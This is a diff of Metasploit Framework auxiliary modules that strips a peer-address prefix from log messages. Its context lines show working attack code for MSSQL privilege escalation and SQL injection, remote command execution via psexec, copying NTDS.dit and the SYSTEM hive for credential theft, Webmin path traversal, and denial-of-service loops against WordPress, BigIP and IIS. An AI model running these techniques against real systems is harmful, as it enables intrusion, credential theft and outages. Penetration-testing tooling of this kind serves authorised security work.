windows_domain_sid.nil? - print_error("#{peer} - Could not recover the SQL Server's domain sid.") + print_error("Could not recover the SQL Server's domain sid.") return else - print_good("#{peer} - Domain sid: #{windows_domain_sid}") + print_good("Domain sid: #{windows_domain_sid}") end # Get a list of windows users, groups, and computer accounts using SUSER_NAME() total_rids = datastore['END_RID'] - datastore['START_RID'] - print_status("#{peer} - Brute forcing #{total_rids} RIDs via SQL injection, be patient...") + print_status("Brute forcing #{total_rids} RIDs via SQL injection, be patient...") domain_users = get_win_domain_users(windows_domain_sid) if domain_users.nil? - print_error("#{peer} - Sorry, no Windows domain accounts were found, or DC could not be contacted.") + print_error("Sorry, no Windows domain accounts were found, or DC could not be contacted.") return end # Print number of objects found and write to a file - print_good("#{peer} - #{domain_users.length} user accounts, groups, and computer accounts were found.") + print_good("#{domain_users.length} user accounts, groups, and computer accounts were found.") # Create table for report windows_domain_login_table = Rex::Ui::Text::Table.new( @@ -179,7 +179,7 @@ class Metasploit3 < Msf::Auxiliary (datastore['START_RID']..datastore['END_RID']).each do |principal_id| rid_diff = principal_id - datastore['START_RID'] if principal_id % 100 == 0 - print_status("#{peer} - #{rid_diff} of #{total_rids } RID queries complete") + print_status("#{rid_diff} of #{total_rids } RID queries complete") end user_sid = build_user_sid(domain_sid, principal_id) @@ -198,7 +198,7 @@ class Metasploit3 < Msf::Auxiliary unless windows_login.empty? || windows_logins.include?(windows_login) windows_logins.push(windows_login) - print_good("#{peer} - #{windows_login}") + print_good(" #{windows_login}") end end diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb index 320c1850a6..95bc7a1694 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb @@ -30,62 +30,62 @@ class Metasploit3 < Msf::Auxiliary def run # Get the database user name - print_status("#{peer} - Grabbing the database user name from ...") + print_status("Grabbing the database user name from ...") db_user = get_username if db_user.nil? - print_error("#{peer} - Unable to grab user name...") + print_error("Unable to grab user name...") return else - print_good("#{peer} - Database user: #{db_user}") + print_good("Database user: #{db_user}") end # Grab sysadmin status - print_status("#{peer} - Checking if #{db_user} is already a sysadmin...") + print_status("Checking if #{db_user} is already a sysadmin...") admin_status = check_sysadmin if admin_status.nil? - print_error("#{peer} - Couldn't retrieve user status, aborting...") + print_error("Couldn't retrieve user status, aborting...") return elsif admin_status == '1' - print_error("#{peer} - #{db_user} is already a sysadmin, no esclation needed.") + print_error("#{db_user} is already a sysadmin, no esclation needed.") return else - print_good("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.") + print_good("#{db_user} is NOT a sysadmin, let's try to escalate privileges.") end # Check for trusted databases owned by sysadmins - print_status("#{peer} - Checking for trusted databases owned by sysadmins...") + print_status("Checking for trusted databases owned by sysadmins...") trust_db_list = check_trust_dbs if trust_db_list.nil? || trust_db_list.length == 0 - print_error("#{peer} - No databases owned by sysadmin were found flagged as trustworthy.") + print_error("No databases owned by sysadmin were found flagged as trustworthy.") return else # Display list of accessible databases to user - print_good("#{peer} - #{trust_db_list.length} affected database(s) were found:") + print_good("#{trust_db_list.length} affected database(s) were found:") trust_db_list.each do |db| print_status(" - #{db}") end end # Check if the user has the db_owner role in any of the databases - print_status("#{peer} - Checking if #{db_user} has the db_owner role in any of them...") + print_status("Checking if #{db_user} has the db_owner role in any of them...") owner_status = check_db_owner(trust_db_list) if owner_status.nil? - print_error("#{peer} - Fail buckets, the user doesn't have db_owner role anywhere.") + print_error("Fail buckets, the user doesn't have db_owner role anywhere.") return else - print_good("#{peer} - #{db_user} has the db_owner role on #{owner_status}.") + print_good("#{db_user} has the db_owner role on #{owner_status}.") end # Attempt to escalate to sysadmin - print_status("#{peer} - Attempting to add #{db_user} to sysadmin role...") + print_status("Attempting to add #{db_user} to sysadmin role...") escalate_privs(owner_status, db_user) admin_status = check_sysadmin if admin_status && admin_status == '1' - print_good("#{peer} - Success! #{db_user} is now a sysadmin!") + print_good("Success! #{db_user} is now a sysadmin!") else - print_error("#{peer} - Fail buckets, something went wrong.") + print_error("Fail buckets, something went wrong.") end end diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb index 346efa1109..9a4493717f 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb @@ -28,60 +28,60 @@ class Metasploit3 < Msf::Auxiliary def run # Get the database user name - print_status("#{peer} - Grabbing the database user name...") + print_status("Grabbing the database user name...") db_user = get_username if db_user.nil? - print_error("#{peer} - Unable to grab user name...") + print_error("Unable to grab user name...") return else - print_good("#{peer} - Database user: #{db_user}") + print_good("Database user: #{db_user}") end # Grab sysadmin status - print_status("#{peer} - Checking if #{db_user} is already a sysadmin...") + print_status("Checking if #{db_user} is already a sysadmin...") admin_status = check_sysadmin if admin_status.nil? - print_error("#{peer} - Couldn't retrieve user status, aborting...") + print_error("Couldn't retrieve user status, aborting...") return elsif admin_status == '1' - print_error("#{peer} - #{db_user} is already a sysadmin, no escalation needed.") + print_error("#{db_user} is already a sysadmin, no escalation needed.") return else - print_status("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.") + print_status("#{db_user} is NOT a sysadmin, let's try to escalate privileges.") end # Get list of users that can be impersonated - print_status("#{peer} - Enumerating a list of users that can be impersonated...") + print_status("Enumerating a list of users that can be impersonated...") imp_user_list = check_imp_users if imp_user_list.nil? || imp_user_list.empty? - print_error("#{peer} - Sorry, the current user doesnt have permissions to impersonate anyone.") + print_error("Sorry, the current user doesnt have permissions to impersonate anyone.") return else # Display list of users that can be impersonated - print_good("#{peer} - #{imp_user_list.length} users can be impersonated:") + print_good("#{imp_user_list.length} users can be impersonated:") imp_user_list.each do |dbuser| - print_status("#{peer} - #{dbuser}") + print_status(" #{dbuser}") end end # Check if any of the users that can be impersonated are sysadmins - print_status("#{peer} - Checking if any of them are sysadmins...") + print_status("Checking if any of them are sysadmins...") imp_user_sysadmin = check_imp_sysadmin(imp_user_list) if imp_user_sysadmin.nil? - print_error("#{peer} - Sorry, none of the users that can be impersonated are sysadmins.") + print_error("Sorry, none of the users that can be impersonated are sysadmins.") return end # Attempt to escalate to sysadmin - print_status("#{peer} - Attempting to impersonate #{imp_user_sysadmin}...") + print_status("Attempting to impersonate #{imp_user_sysadmin}...") escalate_privs(imp_user_sysadmin,db_user) admin_status = check_sysadmin if admin_status && admin_status == '1' - print_good("#{peer} - Success! #{db_user} is now a sysadmin!") + print_good("Success! #{db_user} is now a sysadmin!") else - print_error("#{peer} - Fail buckets, something went wrong.") + print_error("Fail buckets, something went wrong.") end end @@ -179,10 +179,10 @@ class Metasploit3 < Msf::Auxiliary # check if user is a sysadmin if parsed_result && parsed_result[0] == '1' - print_good("#{peer} - #{imp_user} is a sysadmin!") + print_good(" #{imp_user} is a sysadmin!") return imp_user else - print_status("#{peer} - #{imp_user} is NOT a sysadmin") + print_status(" #{imp_user} is NOT a sysadmin") end end diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 7e77949291..684d043437 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Exploiting sqli to extract users information...") + print_status("Exploiting sqli to extract users information...") mark = Rex::Text.rand_text_alpha(8 + rand(5)) rand = Rex::Text.rand_text_numeric(2) separator = Rex::Text.rand_text_alpha(5 + rand(5)) @@ -134,21 +134,21 @@ class Metasploit3 < Msf::Auxiliary data = do_sqli(injection, mark) if data.blank? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end @users = [] @plain_passwords = [] - print_status("#{peer} - Parsing extracted data...") + print_status("Parsing extracted data...") parse_users(data, mark, separator) if @users.empty? - print_error("#{peer} - Users not found") + print_error("Users not found") return else - print_good("#{peer} - #{@users.length} users found!") + print_good("#{@users.length} users found!") end users_table = Rex::Ui::Text::Table.new( diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 749b32d22e..77c3daa7f0 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary begin smb_login rescue Rex::Proto::SMB::Exceptions::Error => autherror - print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") + print_error("Unable to authenticate with given credentials: #{autherror}") return end res = execute_command(text, bat) @@ -96,31 +96,31 @@ class Metasploit3 < Msf::Auxiliary def execute_command(text, bat) # Try and execute the provided command execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}" - print_status("#{peer} - Executing the command...") + print_status("Executing the command...") begin return psexec(execute) rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => exec_command_error elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3) - print_error("#{peer} - Unable to execute specified command: #{exec_command_error}") + print_error("Unable to execute specified command: #{exec_command_error}") return false end end # Retrive output from command def get_output(file) - print_status("#{peer} - Getting the command output...") + print_status("Getting the command output...") output = smb_read_file(@smbshare, @ip, file) if output.nil? - print_error("#{peer} - Error getting command output. #{$!.class}. #{$!}.") + print_error("Error getting command output. #{$!.class}. #{$!}.") return end if output.empty? - print_status("#{peer} - Command finished with no output") + print_status("Command finished with no output") return end # Report output - print_good("#{peer} - Command completed successfuly!") + print_good("Command completed successfuly!") vprint_status("Output for \"#{datastore['COMMAND']}\":") vprint_line("#{output}") @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary fd = smb_open(file, 'rwo') fd.close rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror - print_status("#{peer} - Unable to get handle: #{accesserror}") + print_status("Unable to get handle: #{accesserror}") return false end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") @@ -155,19 +155,19 @@ class Metasploit3 < Msf::Auxiliary # Removes files created during execution. def cleanup_after(*files) simple.connect("\\\\#{@ip}\\#{@smbshare}") - print_status("#{peer} - Executing cleanup...") + print_status("Executing cleanup...") files.each do |file| begin smb_file_rm(file) rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror - print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") + print_error("Unable to cleanup #{file}. Error: #{cleanuperror}") end end left = files.collect{ |f| smb_file_exist?(f) } if left.any? - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") else - print_status("#{peer} - Cleanup was successful") + print_status("Cleanup was successful") end end diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb index dc1fd03215..ed89e046a5 100644 --- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb +++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb @@ -61,12 +61,12 @@ class Metasploit3 < Msf::Auxiliary begin smb_login rescue StandardError => autherror - print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") + print_error("Unable to authenticate with given credentials: #{autherror}") return end # If a VSC was specified then don't try and create one if datastore['VSCPATH'].length > 0 - print_status("#{peer} - Attempting to copy NTDS.dit from #{datastore['VSCPATH']}") + print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}") vscpath = datastore['VSCPATH'] else unless datastore['CREATE_NEW_VSC'] == true @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary download_ntds((datastore['WINPATH'] + "\\Temp\\ntds")) download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys")) else - print_error("#{peer} - Failed to find a volume shadow copy. Issuing cleanup command sequence.") + print_error("Failed to find a volume shadow copy. Issuing cleanup command sequence.") end end cleanup_after(bat, text, "\\#{datastore['WINPATH']}\\Temp\\ntds", "\\#{datastore['WINPATH']}\\Temp\\sys") @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary # then creating a new one def check_vss(text, bat) begin - print_status("#{peer} - Checking if a Volume Shadow Copy exists already.") + print_status("Checking if a Volume Shadow Copy exists already.") prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy' command = "%COMSPEC% /C echo vssadmin list shadows ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" result = psexec(command) @@ -102,14 +102,14 @@ class Metasploit3 < Msf::Auxiliary vscs = [] data.each_line { |line| vscs << line if line.include?("GLOBALROOT") } if vscs.empty? - print_status("#{peer} - No VSC Found.") + print_status("No VSC Found.") return nil end vscpath = prepath + vscs[vscs.length - 1].to_s.split("ShadowCopy")[1].to_s.chomp - print_good("#{peer} - Volume Shadow Copy exists on #{vscpath}") + print_good("Volume Shadow Copy exists on #{vscpath}") return vscpath rescue StandardError => vsscheckerror - print_error("#{peer} - Unable to determine if VSS is enabled: #{vsscheckerror}") + print_error("Unable to determine if VSS is enabled: #{vsscheckerror}") return nil end end @@ -120,16 +120,16 @@ class Metasploit3 < Msf::Auxiliary begin #Try to create the shadow copy command = "%COMSPEC% /C echo #{createvsc} ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" - print_status("#{peer} - Creating Volume Shadow Copy") + print_status("Creating Volume Shadow Copy") out = psexec(command) #Get path to Volume Shadow Copy vscpath = get_vscpath(text) rescue StandardError => vscerror - print_error("#{peer} - Unable to create the Volume Shadow Copy: #{vscerror}") + print_error("Unable to create the Volume Shadow Copy: #{vscerror}") return nil end if vscpath - print_good("#{peer} - Volume Shadow Copy created on #{vscpath}") + print_good("Volume Shadow Copy created on #{vscpath}") return vscpath else return nil @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary end return true rescue StandardError => ntdscopyerror - print_error("#{peer} - Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}") + print_error("Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}") return false end end @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Auxiliary # Checks if ntds.dit was copied to the Windows Temp directory def check_ntds(text) - print_status("#{peer} - Checking if NTDS.dit was copied.") + print_status("Checking if NTDS.dit was copied.") check = "%COMSPEC% /C dir \\#{datastore['WINPATH']}\\Temp\\ntds > #{text}" run = psexec(check) output = smb_read_file(@smbshare, @ip, text) @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary command = "%COMSPEC% /C reg.exe save HKLM\\SYSTEM %WINDIR%\\Temp\\sys /y" return psexec(command) rescue StandardError => hiveerror - print_error("#{peer} - Unable to copy the SYSTEM hive file: #{hiveerror}") + print_error("Unable to copy the SYSTEM hive file: #{hiveerror}") return false end end @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Auxiliary # Download the ntds.dit copy to your attacking machine def download_ntds(file) - print_status("#{peer} - Downloading ntds.dit file") + print_status("Downloading ntds.dit file") begin # Try to download ntds.dit simple.connect("\\\\#{@ip}\\#{@smbshare}") @@ -190,9 +190,9 @@ class Metasploit3 < Msf::Auxiliary data = remotefile.read remotefile.close ntds_path = store_loot("psexec.ntdsgrab.ntds", "application/octet-stream", @ip, data, "ntds.dit") - print_good("#{peer} - ntds.dit stored at #{ntds_path}") + print_good("ntds.dit stored at #{ntds_path}") rescue StandardError => ntdsdownloaderror - print_error("#{peer} - Unable to downlaod ntds.dit: #{ntdsdownloaderror}") + print_error("Unable to downlaod ntds.dit: #{ntdsdownloaderror}") return ntdsdownloaderror end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary # Download the SYSTEM hive copy to your attacking machine def download_sys_hive(file) - print_status("#{peer} - Downloading SYSTEM hive file") + print_status("Downloading SYSTEM hive file") begin # Try to download SYSTEM hive simple.connect("\\\\#{@ip}\\#{@smbshare}") @@ -209,9 +209,9 @@ class Metasploit3 < Msf::Auxiliary data = remotefile.read remotefile.close hive_path = store_loot("psexec.ntdsgrab.hive", "application/octet-stream", @ip, data, "system-hive") - print_good("#{peer} - SYSTEM hive stored at #{hive_path}") + print_good("SYSTEM hive stored at #{hive_path}") rescue StandardError => sysdownloaderror - print_error("#{peer} - Unable to download SYSTEM hive: #{sysdownloaderror}") + print_error("Unable to download SYSTEM hive: #{sysdownloaderror}") return sysdownloaderror end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") @@ -229,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary end return prepath + vsc.split("ShadowCopy")[1].chomp rescue StandardError => vscpath_error - print_error("#{peer} - Could not determine the exact path to the VSC check your WINPATH") + print_error("Could not determine the exact path to the VSC check your WINPATH") return nil end end @@ -237,21 +237,21 @@ class Metasploit3 < Msf::Auxiliary # Removes files created during execution. def cleanup_after(*files) simple.connect("\\\\#{@ip}\\#{@smbshare}") - print_status("#{peer} - Executing cleanup...") + print_status("Executing cleanup...") files.each do |file| begin if smb_file_exist?(file) smb_file_rm(file) end rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror - print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") + print_error("Unable to cleanup #{file}. Error: #{cleanuperror}") end end left = files.collect{ |f| smb_file_exist?(f) } if left.any? - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") else - print_status("#{peer} - Cleanup was successful") + print_status("Cleanup was successful") end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") end diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb index 4381c2addd..77e2f3a893 100644 --- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb +++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" @@ -71,17 +71,17 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 302 and res.get_cookies =~ /sid/ session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? - print_good "#{peer} - Authentication successful" + print_good "Authentication successful" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status("#{peer} - Attempting to retrieve #{datastore['RPATH']}...") + print_status("Attempting to retrieve #{datastore['RPATH']}...") traversal = "../" * datastore['DEPTH'] traversal << datastore['RPATH'] @@ -98,9 +98,9 @@ class Metasploit3 < Msf::Auxiliary loot = $1 f = ::File.basename(datastore['RPATH']) path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, f, datastore['RPATH']) - print_status("#{peer} - #{datastore['RPATH']} saved in #{path}") + print_status("#{datastore['RPATH']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file") + print_error("Failed to retrieve the file") return end diff --git a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb index 28542774fb..f40516c242 100644 --- a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb +++ b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb @@ -67,7 +67,7 @@ class Metasploit4 < Msf::Auxiliary c.send_request(r) # Don't wait for a response rescue ::Rex::ConnectionError => exception - print_error("#{peer} - Unable to connect: '#{exception.message}'") + print_error("Unable to connect: '#{exception.message}'") return ensure disconnect(c) if c diff --git a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb index e935e91cc2..cdc449f22d 100644 --- a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb +++ b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb @@ -56,27 +56,27 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi('method' => 'GET', 'uri' => '/') unless res - print_error("#{peer} - No answer from the BigIP server") + print_error("No answer from the BigIP server") return end # Simple test based on HTTP Server header to detect BigIP virtual server server = res.headers['Server'] unless server =~ /BIG\-IP/ || server =~ /BigIP/ || force_attack - print_error("#{peer} - BigIP virtual server was not detected. Please check options") + print_error("BigIP virtual server was not detected. Please check options") return end - print_status("#{peer} - Starting DoS attack") + print_status("Starting DoS attack") # Start attack limit.times do |step| if step % 100 == 0 - print_status("#{peer} - #{step * 100 / limit}% accomplished...") + print_status("#{step * 100 / limit}% accomplished...") end res = send_request_cgi('method' => 'GET', 'uri' => '/') if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/ - print_good("#{peer} - DoS accomplished: The maximum number of concurrent user sessions has been reached.") + print_good("DoS accomplished: The maximum number of concurrent user sessions has been reached.") return end end @@ -84,18 +84,18 @@ class Metasploit3 < Msf::Auxiliary # Check if attack has failed res = send_request_cgi('method' => 'GET', 'uri' => uri) if res.headers['Location'] =~ /\/my.policy/ - print_error("#{peer} - DoS attack failed. Try to increase the RLIMIT") + print_error("DoS attack failed. Try to increase the RLIMIT") else - print_status("#{peer} - Result is undefined. Try to manually determine DoS attack result") + print_status("Result is undefined. Try to manually determine DoS attack result") end rescue ::Errno::ECONNRESET - print_error("#{peer} - The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached") + print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached") rescue ::Rex::ConnectionRefused - print_error("#{peer} - Unable to connect to BigIP") + print_error("Unable to connect to BigIP") rescue ::Rex::ConnectionTimeout - print_error("#{peer} - Unable to connect to BigIP. Please check options") + print_error("Unable to connect to BigIP. Please check options") rescue ::OpenSSL::SSL::SSLError - print_error("#{peer} - SSL/TLS connection error") + print_error("SSL/TLS connection error") end end diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index b69b8872f1..165a9d582e 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary if check_host(ip) == Exploit::CheckCode::Vulnerable dos_host(ip) else - print_status("#{peer} - Probably not vulnerable, will not dos it.") + print_status("Probably not vulnerable, will not dos it.") end end @@ -72,17 +72,17 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw('uri' => uri) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return file_size end if res.code == 404 - vprint_error("#{peer} - You got a 404. URI must be a valid resource.") + vprint_error("You got a 404. URI must be a valid resource.") return file_size end file_size = res.body.length - vprint_status("#{peer} - File length: #{file_size} bytes") + vprint_status("File length: #{file_size} bytes") return file_size }.call @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Errno::EPIPE, ::Timeout::Error # Same exceptions the HttpClient mixin catches end - print_status("#{peer} - DOS request sent") + print_status("DOS request sent") end def potential_static_files_uris diff --git a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb index efb942abe9..cca21add81 100644 --- a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb +++ b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Triggering a heap overflow to cause DoS...") + print_status("Triggering a heap overflow to cause DoS...") begin res = send_request_cgi( @@ -57,16 +57,16 @@ class Metasploit3 < Msf::Auxiliary 'data' => message }) rescue ::Errno::ECONNRESET - print_good("#{peer} - NFR Agent didn't answer, DoS seems successful") + print_good("NFR Agent didn't answer, DoS seems successful") return end if res - print_error("#{peer} - NFR Agent didn't die, it still answers...") + print_error("NFR Agent didn't die, it still answers...") return end - print_good("#{peer} - NFR Agent didn't answer, DoS seems successful") + print_good("NFR Agent didn't answer, DoS seems successful") end end diff --git a/modules/auxiliary/dos/http/rails_json_float_dos.rb b/modules/auxiliary/dos/http/rails_json_float_dos.rb index 40123ce208..3fb0da5c57 100644 --- a/modules/auxiliary/dos/http/rails_json_float_dos.rb +++ b/modules/auxiliary/dos/http/rails_json_float_dos.rb @@ -75,11 +75,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status "#{peer} - Using digit pattern of #{digit_pattern} taken to #{multiplier} places" + print_status "Using digit pattern of #{digit_pattern} taken to #{multiplier} places" sploit = '[' sploit << evil_float_string sploit << ']' - print_status "#{peer} - Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}" + print_status "Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}" target_available = true begin @@ -91,19 +91,19 @@ class Metasploit3 < Msf::Auxiliary 'data' => sploit }) rescue ::Rex::ConnectionRefused - print_error "#{peer} - Unable to connect. (Connection refused)" + print_error "Unable to connect. (Connection refused)" target_available = false rescue ::Rex::HostUnreachable - print_error "#{peer} - Unable to connect. (Host unreachable)" + print_error "Unable to connect. (Host unreachable)" target_available = false rescue ::Rex::ConnectionTimeout - print_error "#{peer} - Unable to connect. (Timeout)" + print_error "Unable to connect. (Timeout)" target_available = false end return unless target_available - print_status "#{peer} - Checking availability" + print_status "Checking availability" begin res = send_request_cgi({ 'method' => verb, @@ -118,13 +118,13 @@ class Metasploit3 < Msf::Auxiliary target_available = false end rescue ::Rex::ConnectionError, Errno::ECONNRESET - print_good "#{peer} - DoS appears successful (Host unreachable)" + print_good "DoS appears successful (Host unreachable)" target_available = false end return unless target_available - print_status "#{peer} - Target is still responsive, DoS was unsuccessful." + print_status "Target is still responsive, DoS was unsuccessful." end end diff --git a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb index 258f134c4b..8f9e60c3ff 100644 --- a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary def user_exists(user) exists = wordpress_user_exists?(user) if exists - print_good("#{peer} - Username \"#{username}\" is valid") + print_good("Username \"#{username}\" is valid") report_cred( ip: rhost, port: rport, @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary return true else - print_error("#{peer} - \"#{user}\" is not a valid username") + print_error("\"#{user}\" is not a valid username") return false end end @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary def run if wordpress_and_online? if validate_user - print_status("#{peer} - Checking if user \"#{username}\" exists...") + print_status("Checking if user \"#{username}\" exists...") unless user_exists(username) print_error('Aborting operation - a valid username must be specified') return @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Auxiliary starting_thread = 1 while starting_thread < rlimit do ubound = [rlimit - (starting_thread - 1), thread_count].min - print_status("#{peer} - Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") + print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") threads = [] 1.upto(ubound) do |i| @@ -133,20 +133,20 @@ class Metasploit3 < Msf::Auxiliary begin wordpress_login(username, Rex::Text.rand_text_alpha(plength), timeout) rescue => e - print_error("#{peer} - Timed out during request #{(starting_thread - 1) + i}") + print_error("Timed out during request #{(starting_thread - 1) + i}") end end end threads.each(&:join) - print_good("#{peer} - Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}") + print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}") starting_thread += ubound end if wordpress_and_online? - print_error("#{peer} - FAILED: #{target_uri} appears to still be online") + print_error("FAILED: #{target_uri} appears to still be online") else - print_good("#{peer} - SUCCESS: #{target_uri} appears to be down") + print_good("SUCCESS: #{target_uri} appears to be down") end else print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress") diff --git a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb index 489458a65e..1567e9536f 100644 --- a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary # try out the available memory in steps # apache will return a server error if the limit is reached while memory_to_use < 1024 - vprint_status("#{peer} - trying memory limit #{memory_to_use}MB") + vprint_status("trying memory limit #{memory_to_use}MB") opts = { 'method' => 'POST', 'uri' => wordpress_url_xmlrpc, @@ -76,14 +76,14 @@ class Metasploit3 < Msf::Auxiliary # low timeout because the server error is returned immediately res = send_request_cgi(opts, timeout = 3) rescue ::Rex::ConnectionError => exception - print_error("#{peer} - unable to connect: '#{exception.message}'") + print_error("unable to connect: '#{exception.message}'") break end if res && res.code == 500 # limit reached, return last limit last_limit = memory_to_use - fingerprint_step - vprint_status("#{peer} - got an error - using limit #{last_limit}MB") + vprint_status("got 